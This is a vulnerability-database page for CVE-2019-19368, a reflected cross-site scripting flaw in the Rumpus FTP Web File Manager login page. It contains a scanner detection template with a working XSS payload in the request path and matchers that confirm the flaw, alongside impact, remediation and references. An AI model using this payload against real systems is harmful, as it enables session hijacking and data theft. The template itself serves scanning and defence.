CVE-2019-19368: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting

2025-08-01 Rumpus FTP Web File Manager PoC Public

Description

Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.

PoC

id: CVE-2019-19368

info:
  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/harshit-shukla/CVE-2019-19368/
    - https://www.maxum.com/Rumpus/Download.html
    - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-19368
    cwe-id: CWE-79
    epss-score: 0.25889
    epss-percentile: 0.97871
    cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: maxum
    product: rumpus
  tags: cve,cve2019,xss,ftp,packetstorm,maxum,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "value=''><sVg/OnLoAD=alert`1337`//'>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c414329e9e65230f85b28211bed63bfac7570f1d386fbe73de411d38ed23089c02203e668ea0e8cfd9e496f3b068267699d67ddeedde4daa05656f8aafc5b8afb730:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities